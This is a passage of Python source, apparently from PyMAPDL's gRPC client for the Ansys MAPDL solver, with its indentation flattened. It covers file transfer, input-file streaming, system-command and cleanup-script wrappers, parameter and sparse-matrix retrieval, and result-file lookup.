"""Store the process IDs used when launching MAPDL"""
for filename in self.list_files():
if "cleanup" in filename:
script = os.path.join(self.directory, filename)
with open(script) as f:
raw = f.read()
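# the cleanup script references the spawned process IDs; pull them from
# the "/pid <pid>" arguments on Windows or the "kill -9 <pid>"-style
# arguments elsewhere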
if os.name == "nt":
pids = re.findall(r"/pid (\d+)", raw)
else:
pids = set(re.findall(r"-9 (\d+)", raw))
self._pids = [int(pid) for pid in pids]
def _remove_lock_file(self):
"""Removes the lock file.
This must be called because a segfault of MAPDL or ``sys(0)`` will
not remove the lock file.
"""
mapdl_path = self.directory
if mapdl_path:
for lockname in [self.jobname + ".lock", "file.lock"]:
lock_file = os.path.join(mapdl_path, lockname)
if os.path.isfile(lock_file):
try:
os.remove(lock_file)
except OSError:
pass
def _run_cleanup_script(self): # pragma: no cover
"""Run the APDL cleanup script.
On distributed runs MAPDL creates a cleanup script to kill the
processes created by the ANSYS spawner. Normally this file is
removed when APDL exits normally, but on a failure, it's
necessary to manually close these PIDs.
"""
# run cleanup script when local
if self._local:
for filename in self.list_files():
if "cleanup" in filename:
script = os.path.join(self.directory, filename)
if not os.path.isfile(script):
return
if os.name != "nt":
script = ["/bin/bash", script]
process = subprocess.Popen(
script,
shell=False,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
# always communicate to allow process to run
output, err = process.communicate()
self._log.debug(
"Cleanup output:\n\n%s\n%s", output.decode(), err.decode()
)
def list_files(self, refresh_cache=True):
"""List the files in the working directory of MAPDL.
Parameters
----------
refresh_cache : bool, optional
If local, refresh local cache by querying MAPDL for its
current path.
Returns
-------
list
List of files in the working directory of MAPDL.
Examples
--------
>>> files = mapdl.list_files()
>>> for file in files: print(file)
file.lock
file0.bat
file0.err
file0.log
file0.page
file1.err
file1.log
file1.out
file1.page
"""
if self._local: # simply return a python list of files
if refresh_cache:
local_path = self.directory
else:
local_path = self._directory
if local_path:
if os.path.isdir(local_path):
return os.listdir(local_path)
return []
elif self._exited:
raise RuntimeError("Cannot list remote files since MAPDL has exited")
# this will sometimes return 'LINUX x6', 'LIN', or 'L'
if "L" in self.parameters.platform[:1]:
cmd = "ls"
else:
cmd = "dir /b /a"
files = self.sys(cmd).splitlines()
if not files:
warn("No files listed")
return files
@supress_logging
def sys(self, cmd):
"""Pass a command string to the operating system.
APDL Command: /SYS
Passes a command string to the operating system for execution
(see the Operations Guide). Typical strings are system
commands such as list, copy, rename, etc. Control returns to
the ANSYS program after the system procedure is completed.
ANSYS may not be aware of your specific user environment. For
example, on Linux this command may not recognize aliases,
depending on the hardware platform and user environment.
Parameters
----------
cmd : str
Command string, up to 639 characters (including blanks,
commas, etc.). The specified string is passed verbatim to
the operating system, i.e., no parameter substitution is
performed.
Returns
-------
str
Output from the command.
Examples
--------
>>> mapdl.sys('ls')
"""
# always redirect system output to a temporary file
tmp_file = "__tmp_sys_out__"
super().sys(f"{cmd} > {tmp_file}")
if self._local: # no need to download when local
with open(os.path.join(self.directory, tmp_file)) as fobj:
return fobj.read()
return self._download_as_raw(tmp_file).decode()
def download_result(self, path, progress_bar=False, preference=None):
"""Download remote result files to a local directory
Examples
--------
Download remote result files into the current working directory
>>> import os
>>> mapdl.download_result(os.getcwd())
"""
def _download(targets):
for target in targets:
save_name = os.path.join(path, target)
self._download(target, save_name, progress_bar=progress_bar)
if preference:
if preference not in ["rst", "rth"]:
raise ValueError("``preference`` must be either 'rst' or 'rth'")
# result file basename is the jobname
jobname = self.jobname
rth_basename = "%s.%s" % (jobname, "rth")
rst_basename = "%s.%s" % (jobname, "rst")
remote_files = self.list_files()
result_file = None
if self._prioritize_thermal and rth_basename in remote_files:
result_file = rth_basename
elif rst_basename in remote_files and rth_basename in remote_files:
if preference == "rth":
result_file = rth_basename
else:
result_file = rst_basename
elif rst_basename in remote_files:
result_file = rst_basename
elif rth_basename in remote_files:
result_file = rth_basename
if result_file: # found non-distributed result
save_name = os.path.join(path, result_file)
self._download(result_file, save_name, progress_bar=progress_bar)
return save_name
# otherwise, download all the distributed result files
if jobname[-1].isnumeric():
jobname += "_"
rst_files = []
rth_files = []
for filename in remote_files:
if "rst" in filename and jobname in filename:
rst_files.append(filename)
elif "rth" in filename and jobname in filename:
rth_files.append(filename)
if self._prioritize_thermal and rth_files:
targets = rth_files
else:
if rst_files and rth_files:
if preference is None:
raise ValueError(
"Found both structural and thermal results files."
"\nPlease specify which kind to download using:\n"
'``preference="rth"`` or ``preference="rst"``'
)
if preference == "rst":
targets = rst_files
elif preference == "rth":
targets = rth_files
elif rst_files:
preference = "rst"
targets = rst_files
elif rth_files:
preference = "rth"
targets = rth_files
else:
remote_files_str = "\n".join("\t%s" % item for item in remote_files)
print("\t".join("\n%s" % item for item in ["a", "b", "c"]))
raise FileNotFoundError(
"Unable to locate any result file from the "
"following remote result files:\n\n" + remote_files_str
)
_download(targets)
return os.path.join(path, jobname + "0." + preference)
@protect_grpc
def _ctrl(self, cmd):
"""Issue control command to the mapdl server
Available commands:
- 'EXIT'
Calls exit(0) on the server.
- 'set_verb'
Enables verbose mode on the server.
- 'VERSION'
Returns the version string of the server in the form
"MAJOR.MINOR.PATCH". E.g. "0.3.0". Known versions
include:
2020R2 - "0.3.0"
2021R1 - "0.3.0"
2021R2 - "0.4.0"
Unavailable/Flaky:
- 'time_stats'
Prints a table for time stats on the server.
This command appears to be disabled/broken.
- 'mem-stats'
To be added
"""
self._log.debug('Issuing CtrlRequest "%s"', cmd)
request = anskernel.CtrlRequest(ctrl=cmd)
# handle socket closing upon exit
if cmd.lower() == "exit":
try:
# this always returns an error as the connection is closed
self._stub.Ctrl(request)
except (_InactiveRpcError, _MultiThreadedRendezvous):
pass
return
resp = self._stub.Ctrl(request)
if hasattr(resp, "response"):
return resp.response
@wraps(_MapdlCore.cdread)
def cdread(self, option="", fname="", ext="", fnamei="", exti="", **kwargs):
"""Wraps CDREAD"""
option = option.strip().upper()
if option not in ["DB", "SOLID", "COMB"]:
raise ValueError(
f'Option "{option}" is not supported. Please '
"Input the geometry and mesh files separately "
r'with "\INPUT" or ``mapdl.input``'
)
if option == "ALL":
raise ValueError(
f'Option "{option}" is not supported in gRPC mode. Please '
"Input the geometry and mesh files separately "
r'with "\INPUT" or ``mapdl.input``'
)
# The old behaviour is to supply the name and the extension separately.
# To make it easier, also allow names that already include an extension.
basename = os.path.basename(fname)
if len(basename.split(".")) == 1:
# there is no extension in the main name.
if ext:
# if extension is an input as an option (old APDL style)
fname = fname + "." + ext
else:
# Using the default .cdb extension
fname = fname + "." + "cdb"
kwargs.setdefault("verbose", False)
kwargs.setdefault("progress_bar", False)
kwargs.setdefault("orig_cmd", "CDREAD")
kwargs.setdefault("cd_read_option", option.upper())
self.input(fname, **kwargs)
@wraps(_MapdlCore.tbft)
def tbft(
self,
oper="",
id_="",
option1="",
option2="",
option3="",
option4="",
option5="",
option6="",
option7="",
**kwargs,
):
"""Wraps ``_MapdlCore.tbft``."""
if oper.lower() == "eadd":
# Option 2 is the file name, option 3 is the extension,
# and option 4 is the directory.
option3 = option3.replace(".", "")
fname = option2 if not option3 else option2 + "." + option3
filename = os.path.join(option4, fname)
if self._local:
if not os.path.exists(filename) and filename not in self.list_files():
raise FileNotFoundError(f"File '{filename}' could not be found.")
else:
if os.path.exists(filename):
self.upload(filename)
option4 = "" # You don't need the directory if you upload it.
elif filename in self.list_files():
option4 = "" # You don't need the directory if the file is in WDIR
pass
else:
raise FileNotFoundError(f"File '{filename}' could not be found.")
return super().tbft(
oper,
id_,
option1,
option2,
option3,
option4,
option5,
option6,
option7,
**kwargs,
)
@protect_grpc
def input(
self,
fname,
verbose=False,
progress_bar=False,
time_step_stream=None,
chunk_size=512,
orig_cmd="/INP",
**kwargs,
):
"""Stream a local input file to a remote mapdl instance.
Stream the response back and deserialize the output.
Parameters
----------
fname : str
MAPDL input file to stream to the MAPDL grpc server.
time_step_stream : int
Time to wait between streaming updates to send back chunks
from the listener file. Larger values mean more data per
chunk and fewer chunks, but if the command is short, the call
will wait until ``time_step_stream`` has elapsed, leading to a
longer execution time.
Due to stability issues, the default time_step_stream is
dependent on verbosity. The defaults are:
- ``verbose=True``: ``time_step_stream=500``
- ``verbose=False``: ``time_step_stream=50``
These defaults will be ignored if ``time_step_stream`` is
manually set.
orig_cmd : str
Original command. There are some cases where ``input`` is
used to send the file to the gRPC server but we then want
to run something other than ``/INPUT``, for example
``CDREAD``.
Returns
-------
str
Response from MAPDL.
Examples
--------
Load a simple ``"ds.dat"`` input file generated from Ansys
Workbench.
>>> output = mapdl.input('ds.dat')
Load that same file while streaming the output in real-time.
>>> output = mapdl.input('ds.dat', verbose=True)
"""
# always check if file is present as the grpc and MAPDL errors
# are unclear
filename = self._get_file_path(fname, progress_bar)
if time_step_stream is not None:
if time_step_stream <= 0:
raise ValueError("``time_step_stream`` must be greater than 0")
if verbose:
if time_step_stream is None:
time_step_stream = 500
metadata = [
("time_step_stream", str(time_step_stream)),
("chunk_size", str(chunk_size)),
]
request = pb_types.InputFileRequest(filename=filename)
strouts = self._stub.InputFileS(request, metadata=metadata)
responses = []
for strout in strouts:
lines = strout.cmdout
# print out input as it is being run
print("\n".join(lines))
responses.extend(lines)
response = "\n".join(responses)
return response.strip()
# otherwise, not verbose
if time_step_stream is None:
time_step_stream = 50
metadata = [
("time_step_stream", str(time_step_stream)),
("chunk_size", str(chunk_size)),
]
# since we can't directly run /INPUT, we have to write a
# temporary input file that tells MAPDL to read the input
# file.
tmp_name = "_input_tmp_.inp"
tmp_out = "_input_tmp_.out"
if "CDRE" in orig_cmd.upper():
# Using CDREAD
option = kwargs.get("cd_read_option", "COMB")
tmp_dat = f"/OUT,{tmp_out}\n{orig_cmd},'{option}','{filename}'\n"
else:
# Using default INPUT
tmp_dat = f"/OUT,{tmp_out}\n{orig_cmd},'{filename}'\n"
if self._local:
local_path = self.directory
with open(os.path.join(local_path, tmp_name), "w") as f:
f.write(tmp_dat)
else:
self._upload_raw(tmp_dat.encode(), tmp_name)
request = pb_types.InputFileRequest(filename=tmp_name)
# even though we don't care about the output, we still
# need to consume it. Otherwise, since the input file request is
# non-blocking, we could corrupt the service
chunks = self._stub.InputFileS(request, metadata=metadata)
_ = [chunk.cmdout for chunk in chunks] # unstable
# all output (unless redirected) has been written to a temp output
if self._local: # pragma: no cover
with open(os.path.join(local_path, tmp_out)) as f:
output = f.read()
# delete the files to avoid overwriting:
try:
os.remove(tmp_name)
except OSError:
pass
try:
os.remove(tmp_out)
except OSError:
pass
# otherwise, read remote file
else:
output = self._download_as_raw(tmp_out).decode("latin-1")
# Deleting the previous files
self.slashdelete(tmp_name)
self.slashdelete(tmp_out)
return output
def _get_file_path(self, fname, progress_bar=False):
"""Find files in the Python and MAPDL working directories.
**The priority is for the Python directory.**
Hence if the same file is in the Python directory and in the MAPDL directory,
PyMAPDL will upload a copy from the Python directory to the MAPDL directory,
overwriting the MAPDL directory copy.
"""
if os.path.isdir(fname):
raise ValueError(
f"`fname` should be a full file path or name, not the directory '{fname}'."
)
fpath = os.path.dirname(fname)
fname = os.path.basename(fname)
fext = fname.split(".")[-1]
ffullpath = os.path.join(fpath, fname)
if os.path.exists(ffullpath) and self._local:
return ffullpath
if self._local:
if os.path.isfile(fname):
# And it exists
filename = os.path.join(os.getcwd(), fname)
elif fname in self.list_files():
# It exists in the Mapdl working directory
filename = os.path.join(self.directory, fname)
else:
# Finally
raise FileNotFoundError(f"Unable to locate filename '{fname}'")
else: # Non-local
# upload the file if it exists locally
if os.path.isfile(ffullpath):
self.upload(ffullpath, progress_bar=progress_bar)
filename = fname
elif fname in self.list_files():
# It exists in the Mapdl working directory
filename = fname
else:
raise FileNotFoundError(f"Unable to locate filename '{fname}'")
return filename
def _flush_stored(self):
"""Writes stored commands to an input file and runs the input
file. Used with non_interactive.
"""
self._log.debug("Flushing stored commands")
commands = "\n".join(self._stored_commands)
if self._apdl_log:
self._apdl_log.write(commands + "\n")
self._log.debug(
"Writing the following commands to a temporary " "apdl input file:\n%s",
commands,
)
# write to a temporary input file
def build_rand_tmp():
return os.path.join(tempfile.gettempdir(), f"tmp_{random_string()}.inp")
# rare case of duplicated tmpfile (birthday problem)
tmp_filename = build_rand_tmp()
while os.path.isfile(tmp_filename):
tmp_filename = build_rand_tmp()
with open(tmp_filename, "w") as fid:
fid.writelines(commands)
self._store_commands = False
self._stored_commands = []
# run the stored commands
out = self.input(
tmp_filename,
write_to_log=False,
verbose=False,
chunk_size=DEFAULT_CHUNKSIZE,
progress_bar=False,
)
# skip the first line as it simply states that it's reading an input file
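# the fixed +13 offset skips past the matched marker text itself so only
# the command echo that follows is kept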
self._response = out[out.find("LINE= 0") + 13 :]
self._log.info(self._response)
if "*** ERROR ***" in self._response:
raise RuntimeError(
self._response.split("*** ERROR ***")[1].splitlines()[1].strip()
)
# try/except here because MAPDL might not have closed the temp file
try:
os.remove(tmp_filename)
except:
self._log.warning("Unable to remove temporary file %s", tmp_filename)
@protect_grpc
def _get(self, entity, entnum, item1, it1num, item2, it2num):
"""Sends gRPC *Get request.
.. warning::
Not thread safe. Uses ``_get_lock`` to ensure multiple
request are not evaluated simultaneously.
"""
if self._store_commands:
raise RuntimeError(
"Cannot use gRPC enabled ``GET`` when in non_interactive mode. "
"Exit non_interactive mode before using this method."
)
cmd = f"{entity},{entnum},{item1},{it1num},{item2},{it2num}"
# not threadsafe; don't allow multiple get commands
while self._get_lock:
time.sleep(0.001)
self._get_lock = True
try:
getresponse = self._stub.Get(pb_types.GetRequest(getcmd=cmd))
finally:
self._get_lock = False
if getresponse.type == 0:
raise ValueError(
"This is either an invalid get request, or MAPDL is set"
" to the wrong processor (e.g. on BEGIN LEVEL vs."
" POST26)"
)
if getresponse.type == 1:
return getresponse.dval
elif getresponse.type == 2:
return getresponse.sval
raise RuntimeError(f"Unsupported type {getresponse.type} response from MAPDL")
def download_project(self, extensions=None, target_dir=None):
"""Download all the project files located in the MAPDL working directory.
Parameters
----------
extensions : List[Str], Tuple[Str], optional
List of extensions to filter the files before downloading,
by default None.
target_dir : Str, optional
Path where the downloaded files will be located, by default None.
Returns
-------
List[Str]
List of downloaded files.
"""
if not extensions:
files = self.list_files()
list_of_files = self.download(files, target_dir=target_dir)
else:
list_of_files = []
for each_extension in extensions:
list_of_files.extend(
self.download(files=f"*.{each_extension}", target_dir=target_dir)
)
return list_of_files
def download(
self,
files,
target_dir=None,
chunk_size=DEFAULT_CHUNKSIZE,
progress_bar=True,
recursive=False,
): # pragma: no cover
"""Download files from the gRPC instance workind directory
.. warning:: This feature is only available for MAPDL 2021R1 or newer.
Parameters
----------
files : str or List[str] or Tuple(str)
Name of the file on the server. File must be in the same
directory as the mapdl instance. A list of string names or
tuples of string names can also be used.
List current files with :func:`Mapdl.list_files <ansys.mapdl.core.Mapdl.list_files>`.
Alternatively, you can also specify **glob expressions** to
match file names. For example: `'file*'` to match every file whose
name starts with `'file'`.
chunk_size : int, optional
Chunk size in bytes. Must be less than 4MB. Defaults to 256 kB.
progress_bar : bool, optional
Display a progress bar using
``tqdm`` when ``True``. Helpful for showing download
progress.
recursive : bool
Use recursion when using glob pattern.
Notes
-----
There are some considerations to keep in mind when using this command:
* The glob pattern search does not search recursively in remote instances.
* In a remote instance, it is not possible to list or download files in different
locations than the MAPDL working directory.
* If you are running locally and provide a file path, downloading files
from a different folder is allowed.
However, this is not a recommended approach.
Examples
--------
Download a single file:
>>> mapdl.download('file.out')
Download all the files starting with `'file'`:
>>> mapdl.download('file*')
Download every single file in the MAPDL working directory:
>>> mapdl.download('*.*')
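Download all files with a given extension into a local folder (the
``'results'`` directory name is only an example; it is created if missing):
>>> mapdl.download('*.rst', target_dir='results')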
Alternatively, you can download all the files using
:func:`Mapdl.download_project <ansys.mapdl.core.mapdl_grpc.MapdlGrpc.download_project>` (recommended):
>>> mapdl.download_project()
"""
if chunk_size > 4 * 1024 * 1024: # 4MB
raise ValueError(
f"Chunk sizes bigger than 4 MB can generate unstable behaviour in PyMAPDL. "
"Please decrease ``chunk_size`` value."
)
self_files = self.list_files() # to avoid calling it too much
if isinstance(files, str):
if self._local: # pragma: no cover
# in local mode
if os.path.exists(files):
# file exist
list_files = [files]
elif "*" in files:
list_files = glob.glob(files, recursive=recursive)  # glob the local filesystem
if not list_files:
raise ValueError(
f"The `'files'` parameter ({files}) didn't match any file using glob expressions in the local client."
)
else:
raise ValueError(
f"The files parameter ('{files}') does not match any file or pattern."
)
else: # Remote or looking into MAPDL working directory
if files in self_files:
list_files = [files]
elif "*" in files:
# try filter on the list_files
if recursive:
warn(
"The 'recursive' keyword argument does not work with remote instances. So it is ignored."
)
list_files = fnmatch.filter(self_files, files)
if not list_files:
raise ValueError(
f"The `'files'` parameter ({files}) didn't match any file using glob expressions in the remote server."
)
else:
raise ValueError(
f"The `'files'` parameter ('{files}') does not match any file or pattern."
)
elif isinstance(files, (list, tuple)):
if not all([isinstance(each, str) for each in files]):
raise ValueError(
"The parameter `'files'` can be a list or tuple, but it should only contain strings."
)
list_files = files
else:
raise ValueError(
f"The `file` parameter type ({type(files)}) is not supported."
"Only strings, tuple of strings or list of strings are allowed."
)
if target_dir:
try:
os.mkdir(target_dir)
except FileExistsError:
pass
else:
target_dir = os.getcwd()
for each_file in list_files:
try:
file_name = os.path.basename(each_file)  # keep only the file name
# Using the full path would break ``os.path.join(target_dir, file_name)``
# (``target_dir`` defaults to ``os.getcwd()``), so only the base name is
# kept. This flattens the file structure, which is fine because recursive
# download does not work on remote instances.
self._download(
each_file,
out_file_name=os.path.join(target_dir, file_name),
chunk_size=chunk_size,
progress_bar=progress_bar,
)
except FileNotFoundError:
# So far the gRPC interface reports a file size of zero both when the
# file does not exist and when its size is truly zero, even though
# those are two different things.
# In theory, since the file names come from `mapdl.list_files()`,
# the files do exist, so an error here means their size is zero.
pass  # not ideal; the file is simply skipped
return list_files
@protect_grpc
def _download(
self,
target_name,
out_file_name=None,
chunk_size=DEFAULT_CHUNKSIZE,
progress_bar=True,
):
"""Download a file from the gRPC instance
Parameters
----------
target_name : str
Target file on the server. File must be in the same
directory as the mapdl instance. List current files with
``mapdl.list_files()``
out_file_name : str, optional
Save the filename as a different name other than the
``target_name``.
chunk_size : int, optional
Chunk size in bytes. Must be less than 4MB. Defaults to 256 kB.
progress_bar : bool, optional
Display a progress bar using ``tqdm`` when ``True``. Helpful
for showing download progress.
Examples
--------
Download the remote result file "file.rst" as "my_result.rst"
>>> mapdl.download('file.rst', 'my_result.rst')
"""
if out_file_name is None:
out_file_name = target_name
request = pb_types.DownloadFileRequest(name=target_name)
metadata = [("time_step_stream", "200"), ("chunk_size", str(chunk_size))]
chunks = self._stub.DownloadFile(request, metadata=metadata)
file_size = save_chunks_to_file(
chunks, out_file_name, progress_bar=progress_bar, target_name=target_name
)
if not file_size:
raise FileNotFoundError(f'File "{target_name}" is empty or does not exist')
@protect_grpc
def upload(self, file_name, progress_bar=True):
"""Upload a file to the grpc instance
file_name : str
Local file to upload.
progress_bar : bool, optional
Display a progress bar using ``tqdm`` when ``True``. Helpful
for showing download progress.
Returns
-------
str
Base name of the file uploaded. File can be accessed
relative to the mapdl instance with this file name.
Examples
--------
Upload "local_file.inp" while disabling the progress bar
>>> mapdl.upload('local_file.inp', progress_bar=False)
"""
if not os.path.isfile(file_name):
raise FileNotFoundError(f"Unable to locate filename {file_name}")
chunks_generator = get_file_chunks(file_name, progress_bar=progress_bar)
response = self._stub.UploadFile(chunks_generator)
if not response.length:
raise IOError("File failed to upload")
return os.path.basename(file_name)
@protect_grpc
def _get_array(
self,
entity="",
entnum="",
item1="",
it1num="",
item2="",
it2num="",
kloop="",
**kwargs,
):
"""gRPC VGET request.
Send a vget request, receive a bytes stream, and return it as
a numpy array.
Not thread safe as it uses a constant internal temporary
parameter name. This method uses ``_vget_lock`` to ensure
multiple requests are not evaluated simultaneously.
Returns
-------
values : np.ndarray
Numpy 1D array containing the requested *VGET item and entity.
"""
if "parm" in kwargs:
raise ValueError("Parameter name `parm` not supported with gRPC")
while self._vget_lock:
time.sleep(0.001)
self._vget_lock = True
cmd = f"{entity},{entnum},{item1},{it1num},{item2},{it2num},{kloop}"
try:
chunks = self._stub.VGet2(pb_types.GetRequest(getcmd=cmd))
values = parse_chunks(chunks)
finally:
self._vget_lock = False
return values
def _screenshot_path(self):
"""Returns the local path of the MAPDL generated screenshot.
If necessary, downloads the remotely rendered file.
"""
if self._local:
return super()._screenshot_path()
all_filenames = self.list_files()
filenames = []
for filename in all_filenames:
if ".png" == filename[-4:]:
filenames.append(filename)
filenames.sort()
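# after sorting, the last entry is assumed to be the most recently
# generated screenshot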
filename = os.path.basename(filenames[-1])
temp_dir = tempfile.gettempdir()
save_name = os.path.join(temp_dir, "tmp.png")
self._download(filename, out_file_name=save_name)
return save_name
@protect_grpc
def _download_as_raw(self, target_name):
"""Download a file from the gRPC instance as a binary
string without saving it to disk.
"""
request = pb_types.DownloadFileRequest(name=target_name)
chunks = self._stub.DownloadFile(request)
return b"".join([chunk.payload for chunk in chunks])
@property
def is_alive(self) -> bool:
"""True when there is an active connect to the gRPC server"""
if self._exited:
return False
if self.busy:
return True
try:
return bool(self.inquire("", "JOBNAME"))
except:
return False
@property
def xpl(self):
"""MAPDL file explorer
Iteratively navigate through MAPDL files.
Examples
--------
Read the MASS record from the "file.full" file
>>> from ansys.mapdl.core import launch_mapdl
>>> mapdl = launch_mapdl()
>>> xpl = mapdl.xpl
>>> xpl.open('file.full')
>>> vec = xpl.read('MASS')
>>> vec.asarray()
array([ 4, 7, 10, 13, 16, 19, 22, 25, 28, 31, 34, 37, 40, 43, 46, 49, 52,
55, 58, 1], dtype=int32)
"""
return self._xpl
@protect_grpc
def scalar_param(self, pname):
"""Return a scalar parameter as a float.
If parameter does not exist, returns ``None``.
"""
request = pb_types.ParameterRequest(name=pname, array=False)
presponse = self._stub.GetParameter(request)
if presponse.val:
return float(presponse.val[0])
@protect_grpc
def _upload_raw(self, raw, save_as): # consider private
"""Upload a binary string as a file"""
chunks = chunk_raw(raw, save_as)
response = self._stub.UploadFile(chunks)
if response.length != len(raw):
raise IOError("Raw Bytes failed to upload")
# TODO: not fully tested/implemented
@protect_grpc
def Param(self, pname):
presponse = self._stub.GetParameter(pb_types.ParameterRequest(name=pname))
return presponse.val
# TODO: not fully tested/implemented
@protect_grpc
def Var(self, num):
presponse = self._stub.GetVariable(pb_types.VariableRequest(inum=num))
return presponse.val
@property
def math(self):
"""APDL math interface
Returns
-------
:class:`MapdlMath <ansys.mapdl.core.math.MapdlMath>`
Examples
--------
Get the stiffness matrix from MAPDL
>>> mm = mapdl.math
>>> k = mm.stiff()
>>> k.asarray()
<60x60 sparse matrix of type '<class 'numpy.float64'>'
with 1734 stored elements in Compressed Sparse Row format>
Get the mass matrix from MAPDL
>>> m = mm.mass()
>>> m.asarray()
<60x60 sparse matrix of type '<class 'numpy.float64'>'
with 1734 stored elements in Compressed Sparse Row format>
"""
from ansys.mapdl.core.math import MapdlMath
return MapdlMath(self)
@property
@check_version.version_requires((0, 4, 1))
def db(self):
"""
MAPDL database interface.
Returns
-------
:class:`MapdlDb <ansys.mapdl.core.database.MapdlDb>`
Examples
--------
Create a nodes instance.
>>> from ansys.mapdl.core import launch_mapdl
>>> mapdl = launch_mapdl()
>>> # create nodes...
>>> nodes = mapdl.db.nodes
>>> print(nodes)
MAPDL Database Nodes
Number of nodes: 270641
Number of selected nodes: 270641
Maximum node number: 270641
>>> mapdl.nsel("NONE")
>>> print(nodes)
MAPDL Database Nodes
Number of nodes: 270641
Number of selected nodes: 0
Maximum node number: 270641
Return the selection status and the coordinates of node 22.
>>> nodes = mapdl.db.nodes
>>> sel, coord = nodes.coord(22)
>>> coord
(1.0, 0.5, 0.0, 0.0, 0.0, 0.0)
"""
from ansys.mapdl.core.database import MapdlDb
if self._db is None:
self._db = MapdlDb(self)
self._db.start()
return self._db
@protect_grpc
def _data_info(self, pname):
"""Returns the data type of a parameter
APDLMATH vectors only.
"""
request = pb_types.ParameterRequest(name=pname)
return self._stub.GetDataInfo(request)
@protect_grpc
def _vec_data(self, pname):
"""Downloads vector data from a MAPDL MATH parameter"""
dtype = ANSYS_VALUE_TYPE[self._data_info(pname).stype]
request = pb_types.ParameterRequest(name=pname)
chunks = self._stub.GetVecData(request)
return parse_chunks(chunks, dtype)
@protect_grpc
def _mat_data(self, pname, raw=False):
"""Downloads matrix data from a parameter and returns a scipy sparse array"""
try:
from scipy import sparse
except ImportError: # pragma: no cover
raise ImportError("Install ``scipy`` to use this feature") from None
minfo = self._data_info(pname)
stype = ANSYS_VALUE_TYPE[minfo.stype]
mtype = minfo.objtype
shape = (minfo.size1, minfo.size2)
if mtype == 2: # dense
request = pb_types.ParameterRequest(name=pname)
chunks = self._stub.GetMatData(request)
values = parse_chunks(chunks, stype)
return np.transpose(np.reshape(values, shape[::-1]))
elif mtype == 3: # sparse
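# MAPDL exposes a sparse matrix as three auxiliary vectors forming a CSR
# triplet: "<name>::ROWS" is the row pointer (indptr), "<name>::COLS" the
# column indices, and "<name>::VALS" the nonzero values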
indptr = self._vec_data(pname + "::ROWS")
indices = self._vec_data(pname + "::COLS")
vals = self._vec_data(pname + "::VALS")
if raw: # for debug
return vals, indices, indptr, shape
else:
return sparse.csr_matrix(
(vals, indices, indptr), dtype=stype, shape=shape
)
raise ValueError(f'Invalid matrix type "{mtype}"')
@property
def locked(self):
"""Instance is in use within a pool"""
return self._locked
@locked.setter
def locked(self, new_value):
self._locked = new_value
@supress_logging
def __str__(self):
try:
if self._exited:
return "MAPDL exited"
stats = self.slashstatus("PROD", mute=False)
except: # pragma: no cover
return "MAPDL exited"
st = stats.find("*** Products ***")
en = stats.find("*** PrePro")
product = "\n".join(stats[st:en].splitlines()[1:]).strip()
info = f"Product: {product}\n"
info += f"MAPDL Version: {self.version}\n"
info += f"ansys.mapdl Version: {__version__}\n"
return info
@supress_logging
@run_as_prep7
def _generate_iges(self):
"""Save IGES geometry representation to disk"""
basename = "_tmp.iges"
if self._local:
filename = os.path.join(self.directory, basename)
self.igesout(basename, att=1)
else:
self.igesout(basename, att=1)
filename = os.path.join(tempfile.gettempdir(), basename)
self._download(basename, filename, progress_bar=False)
return filename
@property
def _distributed_result_file(self):
"""Path of the distributed result file"""
if not self._distributed:
return
try:
filename = self.inquire("", "RSTFILE")
if not filename:
filename = self.jobname
except:
filename = self.jobname
# ANSYS decided that a jobname ending in a number needs a bonus "_"
if filename[-1].isnumeric():
filename += "_"
rth_basename = "%s0.%s" % (filename, "rth")
rst_basename = "%s0.%s" % (filename, "rst")
rth_file = os.path.join(self.directory, rth_basename)
rst_file = os.path.join(self.directory, rst_basename)
if self._prioritize_thermal:
if not os.path.isfile(rth_file):
raise FileNotFoundError("Thermal Result not available")
return rth_file
if os.path.isfile(rth_file) and os.path.isfile(rst_file):
return last_created([rth_file, rst_file])
elif os.path.isfile(rth_file):
return rth_file
elif os.path.isfile(rst_file):
return rst_file
@property
def _result_file(self):
"""Path of the non-distributed result file"""
try:
filename = self.inquire("", "RSTFILE")
if not filename:
filename = self.jobname
except:
filename = self.jobname
try:
ext = self.inquire("", "RSTEXT")
except: # check if rth file exists
ext = ""
if ext == "":
rth_file = os.path.join(self.directory, "%s.%s" % (filename, "rth"))
rst_file = os.path.join(self.directory, "%s.%s" % (filename, "rst"))
if self._prioritize_thermal and os.path.isfile(rth_file):
return rth_file
if os.path.isfile(rth_file) and os.path.isfile(rst_file):
return last_created([rth_file, rst_file])
elif os.path.isfile(rth_file):
return rth_file
elif os.path.isfile(rst_file):
return rst_file
else:
filename = os.path.join(self.directory, "%s.%s" % (filename, ext))
if os.path.isfile(filename):
return filename
@property
def thermal_result(self):
"""The thermal result object"""
self._prioritize_thermal = True
result = self.result
self._prioritize_thermal = False
return result
def list_error_file(self):
"""Listing of errors written in JOBNAME.err"""
files = self.list_files()
jobname = self.jobname
error_file = None
for test_file in [f"{jobname}.err", f"{jobname}0.err"]:
if test_file in files:
error_file = test_file
break
if not error_file:
return None
if self.local:
return open(os.path.join(self.directory, error_file)).read()
elif self._exited:
raise MapdlExitedError(
"Cannot list error file when MAPDL Service has " "exited"
)
return self._download_as_raw(error_file).decode("latin-1")
@property
def result(self):
"""Binary interface to the result file using ``pyansys.Result``
Examples
--------
>>> mapdl.solve()
>>> mapdl.finish()
>>> result = mapdl.result
>>> print(result)
PyANSYS MAPDL Result file object
Units : User Defined
Version : 18.2
Cyclic : False
Result Sets : 1
Nodes : 3083
Elements : 977
Available Results:
EMS : Miscellaneous summable items (normally includes face pressures)
ENF : Nodal forces
ENS : Nodal stresses
ENG : Element energies and volume
EEL : Nodal elastic strains
ETH : Nodal thermal strains (includes swelling strains)
EUL : Element euler angles
EMN : Miscellaneous nonsummable items
EPT : Nodal temperatures
NSL : Nodal displacements
RF : Nodal reaction forces
"""
from ansys.mapdl.reader import read_binary
from ansys.mapdl.reader.rst import Result
if not self._local:
# download to temporary directory
save_path = os.path.join(tempfile.gettempdir())
result_path = self.download_result(save_path)
else:
if self._distributed_result_file and self._result_file:
result_path = self._distributed_result_file
result = Result(result_path, read_mesh=False)
if result._is_cyclic:
result_path = self._result_file
else:
# return the file with the last access time
filenames = [self._distributed_result_file, self._result_file]
result_path = last_created(filenames)
if result_path is None: # if same return result_file
result_path = self._result_file
elif self._distributed_result_file:
result_path = self._distributed_result_file
result = Result(result_path, read_mesh=False)
if result._is_cyclic:
if not os.path.isfile(self._result_file):
raise RuntimeError("Distributed Cyclic result not supported")
result_path = self._result_file
else:
result_path = self._result_file
if result_path is None:
raise FileNotFoundError("No result file(s) at %s" % self.directory)
if not os.path.isfile(result_path):
